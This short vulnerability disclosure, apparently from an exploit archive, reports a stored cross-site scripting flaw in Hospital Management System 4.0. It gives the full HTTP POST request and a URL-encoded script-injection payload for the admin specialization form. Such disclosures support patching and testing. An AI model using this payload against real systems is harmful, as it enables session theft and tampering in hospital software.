# Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2020-01-02 # Exploit Author: FULLSHADE # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/hospital-management-system-in-php/ # Version: v4.0 # Tested on: Windows # CVE : N/A ================ 1. - Cross Site Scripting (Persistent) ================ URL : http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php Method : POST Parameter: doctorspecilization Attack : POST /hospital/hospital/hms/admin/doctor-specilization.php HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php Content-Type: application/x-www-form-urlencoded Content-Length: 97 Origin: http://10.0.0.214 DNT: 1 Connection: close Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Ctd%3E&submit= ?doctorspecilization parameter is vulnerable to create a persistent and stored XSS exploit in the application depending on how it's viewed